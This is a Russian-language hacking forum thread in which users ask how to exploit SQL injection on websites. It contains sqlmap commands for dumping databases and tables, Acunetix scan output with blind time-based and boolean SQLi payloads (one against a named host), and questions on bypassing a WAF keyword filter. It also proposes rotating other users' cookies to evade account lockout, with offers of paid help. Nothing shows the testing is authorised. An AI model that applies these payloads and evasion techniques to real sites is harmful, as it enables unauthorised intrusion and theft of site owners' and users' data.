я знаю что есть ерор,унион,болеан,таймбасед,стэйкед,инлине а как выглядит UPDATE?как проверить UPDATE или нет?
Доброго времени всем. При таком запросе: sqlmap.py --random-agent -u "https://www.site.com" --dbs --keep-alive Получаю название бд. Дальше при такой команде: sqlmap.py --random-agent -u "https://www.site.com" target url -D dbname --tables Получаю следующее: Spoiler: Скриншот Пробовал напрямую делать запрос: sqlmap.py --random-agent -u "https://site.com" target url -D dbname -T user --columns Такая же ошибка Я так понимаю дело в этом? Подскажите пожалуйста, какие команды можно попробовать? Что можно сделать? Структура движка мне знакома. Исходя из этого, названия таблиц и колонок я предположительно знаю. P.s Если у кого есть свободное время, и опыт в обходе WAF, просьба написать в лс. Есть предложение на взаимовыгодных условиях.
UPDATE, это оператор который обновляет столбцы в базе данных. mysql.ru/docs/man/UPDATE.html Если выполнить вывод из той же таблицы в которую гипотетически идет обновление строк, MySQL выбьет ошибку Can't specify target table for update in FROM clause
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться например это? The vulnerability affects https://site.com/product/11/HP-4250N-LaserJet-Printer-LIKE-NEW , X-Forwarded-For Discovered by Blind SQL Injection Attack Details arrow_drop_up HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z Tests performed: 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218 Original value: 3iv1i HTTP Request arrow_drop_up GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0 X-Requested-With: XMLHttpRequest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: copyfaxes.com Connection: Keep-alive
и это например?буду предельно благодарен за помощь. The vulnerability affects https://www.site.com/ , /<s>-<n>-[*]-<n>.html Discovered by Blind SQL Injection Attack Details arrow_drop_up Path Fragment input /<s>-<n>-[*]-<n>.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL Tests performed: volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 3*3<(2*4) AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE volts-amplifier-and-cd-players' AND 3*3*9<(2*4) AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 5*6<26 AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE Original value: volts-amplifier-and-cd-players HTTP Request arrow_drop_up GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUNL-1517.html HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://www.site.com/ Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Host: www.site.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive
Всем привет. Acunetix выдал такое: Code: Уязвимость затрагивает https://www.site.com/ , / <s> / <s> / [*] / <s> / Обнаружено слепым SQL-инъекцией Детали атаки arrow_drop_up Вход фрагмента пути / <s> / <s> / [*] / <s> / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены тесты : 0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294 0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283 0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29 0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286 0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314 0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31 Первоначальное значение: doe-spiransuchor HTTP-запрос arrow_drop_up GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z / Как правильно скормить в sqlmap?
Можно ли обойти WAF который блокирует все запросы POST, GET, в которых содержится "select*from", "update*set","delete*from" регистро-независимо? Не совсем понятно на каком уровне проходит WAF, но urlencode блокируется. back-end DBMS: MySQL >= 5.0.0 banner: '5.7.26-log' server: Apache/2.2.15 (CentOS) x-powered-by: PHP/5.3.3
столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
если акунетикс пишет SQL injection а не блинд, значит ложные исключены? Как часто акунетикс выдает ложные скули?
Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15